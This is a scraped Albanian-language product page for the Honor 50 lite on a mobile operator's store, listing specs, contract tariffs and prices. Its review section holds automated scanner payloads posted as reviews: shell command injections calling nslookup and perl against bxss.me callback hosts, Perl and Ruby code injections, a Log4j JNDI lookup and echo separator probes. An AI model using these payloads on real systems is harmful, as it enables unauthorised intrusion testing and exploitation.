Honor Honor 50 lite

Mos humbisni asnjë detaj të ekranit super të madh të Honor 50 lite, i cili përmban teknologjinë e përshtatjes automatike të ngjyrave dhe dritës së duhur që ofrojnë një përvojë komode dhe realiste të imazhit që shihni. Në të njëjtën kohë, ndjehuni të sigurt dhe të relaksuar gjatë përdorimit të smartfonit, sepse ai vjen me mundësinë e mbushjes super të shpejtë, që në kushte të caktuara bateria mbushet deri në 40% për një periudhë prej 10 minutash.

Lexo më shumë
6GB / 128GB
64+8+2+2MP rear + 16MP front
4300 mAh
6.67" TFT LCD Display
Octa-core
zbritje online 4.000 den.
Sasi të kufizuara
Në dispozicion
Nuk është në dispozicion onlajn
Ngjyrën: Midnight Black

Në dispozicion në sasi të kufizuara

Në dispozicion

Nuk është në dispozicion onlajn

Tarifa
A1 Nova M
Ndrysho tarifën
Mënyra e pagesës
Me tarif� t� nj�hershme prej 199 den. p�r pajisje me k�ste
Çmimi

379 den. x 24 muaj

209 den. x 24 muaj

Transporti falas

A dëshironi të dini kur do të ketë në dispozicion

Sasi të kufizuara
Në dispozicion
Nuk është në dispozicion onlajn

A1 Nova XS

499 den./muaj

 
 
4GB
 
internet kombëtar 
 
 
  
  
Pakufizuar
 
minuta kombëtare 
  
 
 
  
  
 
 
  

Çmimi për Honor Honor 50 lite

459 den. x 24 muaj
Zgjidhni

A1 Nova S

899 den./muaj

 
60GB
 
internet kombëtar 
A1 Net Sef
 
deri më 50GB 
  
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
 
 
  
  
 
 
  
  

Çmimi për Honor Honor 50 lite

334 den. x 24 muaj
Zgjidhni

A1 Nova M

1.099 den./muaj

Tarifa e rekomanduar
5G
 
pakufizuar
 
internet kombëtar 
A1 Net Sef
 
deri më 100GB 
me mundësi për shkëmbim 
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
 
 
  
  
 
 
  
  

Çmimi për Honor Honor 50 lite

209 den. x 24 muaj
E zgjedhur

A1 Nova L

1.299 den./muaj

5G
 
pakufizuar
 
internet kombëtar 
A1 Net Sef
 
deri më 100GB 
me mundësi për shkëmbim 
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
 
 
  
  
 
 
  
  

Çmimi për Honor Honor 50 lite

129 den. x 24 muaj
Zgjidhni
Zgjidhni tarifën
Враќање на производ
Бесплатна достава
Секогаш во добивка
Безбедно плаќање

Dashuri në shikim të parë

Tani ekrani është më i madh falë kufirit të hollë prej vetëm 1,05 mm. Ekrani i madh 6,67 "HONOR FullView ndryshon ngjyrat dhe ndriçimin falë konvertimit të bazuar në ndryshimet e temperaturës.

66W HONOR SuperCharge

Karikoni baterinë e telefonit Tuaj deri në 40% për vetëm 10 minuta me ndihmën e opsionit 66 W "SuperCharging". Mund të karikoni më shumë se gjysmën e kapacitetit të baterisë përderisa përfundoni rutinën tuaj të mëngjesit.

Kapni bukurinë e fotografive përmes detajeve

Kamera kryesore me rezolucion 1 / 1,7” 64 MP, përmirëson ndjeshëm kontrastin dhe cilësinë e fotografisë gjatë fotografimit të natës ose ditës. Fotografoni më shumë detaje me 8 MP kamerë me kënd të gjerë ose fotografoni objekte me afërsi deri në 4 cm. me kamerën e pavarur "makro".

Qëndroni gjithmonë online, plot energji

Me baterinë që ka kapacitet prej 4300 mAh, do të mund të jeni online deri në 16 orë, do të mund të shikoni video deri në 8 orë ose të luani video lojën Tuaj të preferuar deri në 7 orë.

6.67” TFT LCD Display
64+8+2+ 2MP rear + 16MP front
Octa-Core, Qualcomm Snapdragon 662
128GB internal / 6GB RAM

Honor Honor 50 lite

Çmimi i pajisjes dhe tarifa
Tarifa
Kohëzgjatja e kontratës
Mënyra e pagesës
Me tarif� t� nj�hershme prej 199 den. p�r pajisje me k�ste

A1 Nova XS

499 den./muaj

 
 
4GB
 
internet kombëtar 
 
 
  
  
Pakufizuar
 
minuta kombëtare 
  
 
 
  
  
 
 
  

Çmimi për Honor Honor 50 lite

459 den. x 24 muaj
Zgjidhni

A1 Nova S

899 den./muaj

 
60GB
 
internet kombëtar 
A1 Net Sef
 
deri më 50GB 
  
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
 
 
  
  
 
 
  
  

Çmimi për Honor Honor 50 lite

334 den. x 24 muaj
Zgjidhni

A1 Nova M

1.099 den./muaj

Tarifa e rekomanduar
5G
 
pakufizuar
 
internet kombëtar 
A1 Net Sef
 
deri më 100GB 
me mundësi për shkëmbim 
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
 
 
  
  
 
 
  
  

Çmimi për Honor Honor 50 lite

209 den. x 24 muaj
E zgjedhur

A1 Nova L

1.299 den./muaj

5G
 
pakufizuar
 
internet kombëtar 
A1 Net Sef
 
deri më 100GB 
me mundësi për shkëmbim 
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
 
 
  
  
 
 
  
  

Çmimi për Honor Honor 50 lite

129 den. x 24 muaj
Zgjidhni

A1 Nova XL

1.599 den./muaj

5G
 
pakufizuar
 
internet kombëtar 
A1 Net Sef
 
deri më 100GB 
me mundësi për shkëmbim 
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
100 minuta
 
biseda jashtë vendit 
  
 
 
  
  

Çmimi për Honor Honor 50 lite

/

A1 Nova XS SIM

449 den./muaj

 
 
4GB
 
internet kombëtar 
 
 
  
  
Pakufizuar
 
minuta kombëtare 

Çmimi për Honor Honor 50 lite

/

A1 Nova S SIM

799 den./muaj

 
60GB
 
internet kombëtar 
A1 Net Sef
 
deri më 50GB 
  
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  

Çmimi për Honor Honor 50 lite

/

A1 Nova M SIM

999 den./muaj

5G
 
pakufizuar
 
internet kombëtar 
A1 Net Sef
 
deri më 100GB 
me mundësi për shkëmbim 
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  

Çmimi për Honor Honor 50 lite

/

A1 Nova L SIM

1.099 den./muaj

5G
 
pakufizuar
 
internet kombëtar 
A1 Net Sef
 
5GB internet në roaming 
100 minuta jashtë vendit 
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  

Çmimi për Honor Honor 50 lite

/

A1 Nova XL SIM

1.399 den./muaj

5G
 
pakufizuar
 
internet kombëtar 
A1 Net Sef
 
deri më 100GB 
me mundësi për shkëmbim 
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
100 minuta
 
biseda jashtë vendit 
  

Çmimi për Honor Honor 50 lite

/

A1 Senior

299 den./muaj

 
 
500MB
 
internet kombëtar 
Pakufi
 
Minuta drejt A1 
  
50
 
Minuta drejt rrjeteve tjera 
kombëtare (fikse/cel.) 
50
 
SМЅ drejt të gjitha 
rrjeteve kombëtare 

Çmimi për Honor Honor 50 lite

/
Basic price
16.999denarë
Pripejd
18.999denarë
Çmimi vetëm për pajisjen
18.999denarë

Zgjidh

Honor Honor 50 lite

Çka ka në kuti?
  • Honor 50 lite
  • Адаптер за полнење
  • Кабел за полнење
  • Упатство за употреба
  • Гарантен лист
Karakteristikat themelore
  • 6GB / 128GB
  • 64+8+2+2MP rear + 16MP front
  • 4300 mAh
  • 6.67" TFT LCD Display
  • Octa-core
8.5 mm
74.7 mm
161.8 mm
Karakteristikat e hollësishme
Rrjeti GSM/HSPA/LTE
Lloji i SIM Dual Nano SIM
Ekrani TFT LCD Display (1080 x 2376)
Madhësia e ekranit 6.67"
Kamera 64MP + 8MP + 2MP + 2MP
Sistemi operativ Android
CPU Octa-core Qualcomm SDM662
Memorja e integruar 128 GB
RAM memorja 6 GB
Bateria Li-Ion 4300 mAh
Menyja në maqedonisht Yes
Telefoni punon vetëm me A1 SIM kartelë No
Kamera e përparme 16MP
Dimensionet 161.8 x 74.7 x 8.5 mm
Pesha 192g
Garancia 24

Honor Honor 50 lite

Garancia dhe servisi
24
muajgarancia e prodhuesit
Servisues i autorizuar për këtë pajisje

Nëse keni nevojë për servis për Honor Honor 50 lite, kontaktoni servisuesin e autorizuar.

Honor Honor 50 lite

Vlerësimi nga shfrytëzuesit

Ka gjithsej 25 recenzione për këtë pajisje

14
6
5
0
0
4.4
&(nslookup hitzkyktwhkspf4590.bxss.me||perl -e "gethostbyname('hitzkyktwhkspf4590.bxss.me')")&'\"`0&(nslookup hitzkyktwhkspf4590.bxss.me||perl -e "gethostbyname('hitzkyktwhkspf4590.bxss.me')")&`'
19.01.2023

A Ju ndihmoi ky recenzion?
pHqghUme
19.01.2023

A Ju ndihmoi ky recenzion?
pHqghUme
19.01.2023

A Ju ndihmoi ky recenzion?
|(nslookup hitsolojogsxk85071.bxss.me||perl -e "gethostbyname('hitsolojogsxk85071.bxss.me')")
19.01.2023

A Ju ndihmoi ky recenzion?
`(nslookup hitwomhwqmtqlb06bf.bxss.me||perl -e "gethostbyname('hitwomhwqmtqlb06bf.bxss.me')")`
19.01.2023

A Ju ndihmoi ky recenzion?
pHqghUme
19.01.2023

A Ju ndihmoi ky recenzion?
Darko Krstevski
03.03.2022

Odlicen telefon

A Ju ndihmoi ky recenzion?
03.03.2022

A Ju ndihmoi ky recenzion?
'.gethostbyname(lc('hitao'.'brprvlaf695cf.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(86).chr(109).chr(84).'
21.01.2023

A Ju ndihmoi ky recenzion?
"+"A".concat(70-3).concat(22*4).concat(114).concat(88).concat(99).concat(73)+(require"socket" Socket.gethostbyname("hiths"+"azsegerwd2729.bxss.me.")[3].to_s)+"
21.01.2023

A Ju ndihmoi ky recenzion?
pHqghUme
21.01.2023

A Ju ndihmoi ky recenzion?
pHqghUme
21.01.2023

A Ju ndihmoi ky recenzion?
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
21.01.2023

A Ju ndihmoi ky recenzion?
".gethostbyname(lc("hittt"."rrmvlcff2f981.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(88).chr(118).chr(68)."
21.01.2023

A Ju ndihmoi ky recenzion?
pHqghUme
21.01.2023

A Ju ndihmoi ky recenzion?
pHqghUme
21.01.2023

A Ju ndihmoi ky recenzion?
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}//dns.log4j..-5639..9c566${::-.}1${::-.}bxss.me}}
17.01.2023

A Ju ndihmoi ky recenzion?
07.03.2022

A Ju ndihmoi ky recenzion?
echo oakynu$()\ kymhty\nz^xyu||a #' &echo oakynu$()\ kymhty\nz^xyu||a #|" &echo oakynu$()\ kymhty\nz^xyu||a #
17.01.2023

A Ju ndihmoi ky recenzion?
;(nslookup hitrohyozcgvlf94a4.bxss.me||perl -e "gethostbyname('hitrohyozcgvlf94a4.bxss.me')")|(nslookup hitrohyozcgvlf94a4.bxss.me||perl -e "gethostbyname('hitrohyozcgvlf94a4.bxss.me')")&(nslookup hitrohyozcgvlf94a4.bxss.me||perl -e "gethostbyname('hitrohy
21.01.2023

A Ju ndihmoi ky recenzion?
'.gethostbyname(lc('hitux'.'esqpkjobe33c8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(79).chr(100).chr(86).'
17.01.2023

A Ju ndihmoi ky recenzion?
;(nslookup hitlyreofuowha00e2.bxss.me||perl -e "gethostbyname('hitlyreofuowha00e2.bxss.me')")|(nslookup hitlyreofuowha00e2.bxss.me||perl -e "gethostbyname('hitlyreofuowha00e2.bxss.me')")&(nslookup hitlyreofuowha00e2.bxss.me||perl -e "gethostbyname('hitlyre
17.01.2023

A Ju ndihmoi ky recenzion?
23.08.2022

A Ju ndihmoi ky recenzion?
'+'A'.concat(70-3).concat(22*4).concat(115).concat(84).concat(121).concat(73)+(require'socket' Socket.gethostbyname('hitfy'+'ahfmjqne9a76c.bxss.me.')[3].to_s)+'
17.01.2023

A Ju ndihmoi ky recenzion?
abc123
23.04.2023

A Ju ndihmoi ky recenzion?